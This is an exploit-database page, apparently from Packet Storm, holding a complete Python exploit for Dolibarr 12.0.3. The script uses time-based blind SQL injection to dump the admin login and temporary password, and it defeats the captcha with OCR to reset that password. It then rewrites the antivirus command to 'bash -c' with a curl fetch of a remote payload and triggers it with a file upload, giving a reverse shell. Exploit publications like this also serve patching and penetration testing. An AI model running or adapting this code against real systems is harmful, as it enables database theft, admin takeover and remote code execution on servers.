Lucene search

K
packetstormCoiffeurPACKETSTORM:160448
HistoryDec 11, 2020 - 12:00 a.m.

Dolibarr 12.0.3 SQL Injection / Remote Code Execution

2020-12-1100:00:00
coiffeur
packetstormsecurity.com
502
`# Exploit Title: Dolibarr 12.0.3, SQLi to RCE  
# Date: 2/12/2020  
# Exploit Author: coiffeur  
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011  
# Vendor Homepage: https://www.dolibarr.org/  
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/  
# Version: 12.0.3  
  
import argparse  
import binascii  
import random  
import re  
from io import BytesIO  
from urllib.parse import quote_plus as qp  
  
import bcrypt  
import pytesseract  
import requests  
from bs4 import BeautifulSoup  
from PIL import Image  
  
DELTA = None  
DEBUG = 1  
SESSION = requests.session()  
TRESHOLD = 0.80  
DELAY = 1  
LIKE = "%_subscription"  
COLUMNS = ["login", "pass_temp"]  
  
  
def usage():  
banner = """NAME: Dolibarr SQLi to RCE (authenticate)  
SYNOPSIS: python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PASSWORD>  
EXAMPLE:  
python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12.0.3/htdocs/" -u test -p test  
AUTHOR: coiffeur  
"""  
print(banner)  
exit(-1)  
  
  
def hex(text):  
return "0x" + binascii.hexlify(text.encode()).decode()  
  
  
def hash(password):  
salt = bcrypt.gensalt()  
hashed = bcrypt.hashpw(password.encode(), salt)  
return hashed.decode()  
  
  
def authenticate(url, username, password):  
datas = {  
"actionlogin": "login",  
"loginfunction": "loginfunction",  
"username": username,  
"password": password  
}  
r = SESSION.post(f"{url}index.php", data=datas,  
allow_redirects=False, verify=False)  
if r.status_code != 302:  
if DEBUG:  
print(f"[x] Authentication failed!")  
return 0  
if DEBUG:  
print(f" [*] Authenticated as: {username}")  
return 1  
  
  
def get_antispam_code(base_url):  
code = ""  
while len(code) != 5:  
r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)  
temp_image = f"/tmp/{random.randint(0000,9999)}"  
with open(temp_image, "wb") as f:  
f.write(r.content)  
with open(temp_image, "rb") as f:  
code = pytesseract.image_to_string(  
Image.open(BytesIO(f.read()))).split("\n")[0]  
for char in code:  
if char not in "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679":  
code = ""  
break  
return code  
  
  
def reset_password(url, login):  
for _ in range(5):  
code = get_antispam_code(url)  
headers = {  
"Referer": f"{url}user/passwordforgotten.php"  
}  
datas = {  
"action": "buildnewpassword",  
"username": login,  
"code": code  
}  
r = SESSION.post(url=f"{url}user/passwordforgotten.php",  
data=datas, headers=headers, verify=False)  
if r.status_code == 200:  
for response in [f"Request to change password for {login} sent to", f"Demande de changement de mot de passe pour {login} envoyée"]:  
if r.text.find(response):  
if DEBUG:  
print(f" [*] Password reset using code: {code}")  
return 1  
return 0  
  
  
def change_password(url, login, pass_temp):  
r = requests.get(url=f"{url}user/passwordforgotten.php?action=validatenewpassword&username={qp(login)}&passwordhash={hash(pass_temp)}",  
allow_redirects=False, verify=False)  
if r.status_code == 302:  
if DEBUG:  
print(f" [*] Password changed: {pass_temp}")  
return 1  
return 0  
  
  
def change_binary(url, command, parameters):  
headers = {  
"Referer": f"{url}admin/security_file.php"  
}  
datas = {  
"action": "updateform",  
"MAIN_UPLOAD_DOC": "2048",  
"MAIN_UMASK": "0664",  
"MAIN_ANTIVIRUS_COMMAND": command,  
"MAIN_ANTIVIRUS_PARAM": parameters  
}  
r = SESSION.post(url=f"{url}admin/security_file.php",  
data=datas, headers=headers, verify=False)  
if r.status_code == 200:  
for response in ["Record modified successfully", "Enregistrement modifié avec succès"]:  
if response in r.text:  
if DEBUG:  
print(f" [*] Binary's path changed")  
return 1  
return 0  
  
  
def trigger_exploit(url):  
headers = {  
"Referer": f"{url}admin/security_file.php"  
}  
files = {  
"userfile[]": open("junk.txt", "rb"),  
}  
datas = {  
"sendit": "Upload"  
}  
if DEBUG:  
print(f" [*] Triggering reverse shell")  
r = SESSION.post(url=f"{url}admin/security_file.php",  
files=files, data=datas, headers=headers, verify=False)  
if r.status_code == 200:  
for response in ["File(s) uploaded successfully", "The antivirus program was not able to validate the file (file might be infected by a virus)", "Fichier(s) téléversés(s) avec succès", "L'antivirus n'a pas pu valider ce fichier (il est probablement infecté par un virus) !"]:  
if response in r.text:  
if DEBUG:  
print(f" [*] Exploit done")  
return 1  
return 0  
  
  
def get_version(url):  
r = SESSION.get(f"{url}index.php", verify=False)  
x = re.findall(  
r"Version Dolibarr [0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}", r.text)  
if x:  
version = x[0]  
if "12.0.3" in version:  
if DEBUG:  
print(f" [*] {version} (exploit should work)")  
return 1  
if DEBUG:  
print(f"[*] Version may not be vulnerable")  
return 0  
  
  
def get_privileges(url):  
r = SESSION.get(f"{url}index.php", verify=False)  
x = re.findall(r"id=\d", r.text)  
if x:  
id = x[0]  
if DEBUG:  
print(f" [*] id found: {id}")  
r = SESSION.get(f"{url}user/perms.php?{id}", verify=False)  
soup = BeautifulSoup(r.text, 'html.parser')  
for img in soup.find_all("img"):  
if img.get("title") in ["Actif", "Active"]:  
for td in img.parent.parent.find_all("td"):  
privileges = [  
"Consulter les commandes clients", "Read customers orders"]  
for privilege in privileges:  
if privilege in td:  
if DEBUG:  
print(  
f" [*] Check privileges: {privilege}")  
return 1  
if DEBUG:  
print(f"[*] At the sight of the privileges, the exploit may fail")  
return 0  
  
  
def check(url, payload):  
headers = {  
"Referer": f"{url}commande/stats/index.php?leftmenu=orders"  
}  
datas = {"object_status": payload}  
r = SESSION.post(url=f"{url}commande/stats/index.php",  
data=datas, headers=headers, verify=False)  
return r.elapsed.total_seconds()  
  
  
def evaluate_delay(url):  
global DELTA  
deltas = []  
payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"  
for _ in range(4):  
deltas.append(check(url, payload))  
DELTA = sum(deltas)/len(deltas)  
if DEBUG:  
print(f" [+] Delta: {DELTA}")  
  
  
def get_tbl_name_len(url):  
i = 0  
while 1:  
payload = f"IF((SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_name LIKE {hex(LIKE)})>{i}, SLEEP(0), SLEEP({DELAY}))"  
if check(url, payload) >= DELTA*TRESHOLD:  
return i  
if i > 100:  
print(f"[x] Exploit failed")  
exit(-1)  
i += 1  
  
  
def get_tbl_name(url, length):  
tbl_name = ""  
for i in range(1, length+1):  
min, max = 0, 127-1  
while min < max:  
mid = (max + min) // 2  
payload = f"IF((SELECT ASCII(SUBSTR(table_name,{i},1)) FROM information_schema.tables WHERE table_name LIKE {hex(LIKE)})<={mid}, SLEEP({DELAY}), SLEEP(0))"  
if check(url, payload) >= DELTA*TRESHOLD:  
max = mid  
else:  
min = mid + 1  
tbl_name += chr(min)  
return tbl_name  
  
  
def get_elt_len(url, tbl_name, column_name):  
i = 0  
while 1:  
payload = f"IF((SELECT LENGTH({column_name}) FROM {tbl_name} LIMIT 1)>{i}, SLEEP(0), SLEEP({DELAY}))"  
if check(url, payload) >= DELTA*TRESHOLD:  
return i  
if i > 100:  
print(f"[x] Exploit failed")  
exit(-1)  
i += 1  
  
  
def get_elt(url, tbl_name, column_name, length):  
elt = ""  
for i in range(1, length+1):  
min, max = 0, 127-1  
while min < max:  
mid = (max + min) // 2  
payload = f"IF((SELECT ASCII(SUBSTR({column_name},{i},1)) FROM {tbl_name} LIMIT 1)<={mid} , SLEEP({DELAY}), SLEEP(0))"  
if check(url, payload) >= DELTA*TRESHOLD:  
max = mid  
else:  
min = mid + 1  
elt += chr(min)  
return elt  
  
  
def get_row(url, tbl_name):  
print(f" [*] Dump admin's infos from {tbl_name}")  
infos = {}  
for column_name in COLUMNS:  
elt_length = get_elt_len(url, tbl_name, column_name)  
infos[column_name] = get_elt(url, tbl_name, column_name, elt_length)  
if DEBUG:  
print(f" [+] Infos: {infos}")  
return infos  
  
  
def main(url, username, password):  
# Check if exploit is possible  
print(f"[*] Requirements:")  
if not authenticate(url, username, password):  
print(f"[x] Exploit failed!")  
exit(-1)  
get_version(url)  
get_privileges(url)  
  
print(f"\n[*] Starting exploit:")  
# Evaluate delay  
evaluate_delay(url)  
print(f" [*] Extract prefix (using table: {LIKE})")  
tbl_name_len = get_tbl_name_len(url)  
tbl_name = get_tbl_name(url, tbl_name_len)  
prefix = f"{tbl_name.split('_')[0]}_"  
if DEBUG:  
print(f" [+] Prefix: {prefix}")  
  
# Dump admin's infos  
user_table_name = f"{prefix}user"  
infos = get_row(url, user_table_name)  
if not infos["login"]:  
print(f"[x] Exploit failed!")  
exit(-1)  
  
# Reset admin's passworrd  
if DEBUG:  
print(f" [*] Reseting {infos['login']}'s password")  
if not reset_password(url, infos["login"]):  
print(f"[x] Exploit failed!")  
exit(-1)  
infos = get_row(url, user_table_name)  
  
# Remove cookies to logout  
# Change admin's password  
# Login as admin  
SESSION.cookies.clear()  
if not change_password(url, infos['login'], infos['pass_temp']):  
print(f"[x] Exploit failed!")  
exit(-1)  
authenticate(url, infos['login'], infos['pass_temp'])  
  
# Change antivirus's binary path  
# Trigger reverse shell  
change_binary(url, "bash", '-c "$(curl http://127.0.0.1:8000/poc.txt)"')  
trigger_exploit(url)  
return 0  
  
  
if __name__ == "__main__":  
parser = argparse.ArgumentParser()  
parser.add_argument("-t", help="Base URL of Dolibarr")  
parser.add_argument("-u", help="Username")  
parser.add_argument("-p", help="Password")  
args = parser.parse_args()  
  
if not args.t or not args.u or not args.p:  
usage()  
  
main(args.t, args.u, args.p)  
`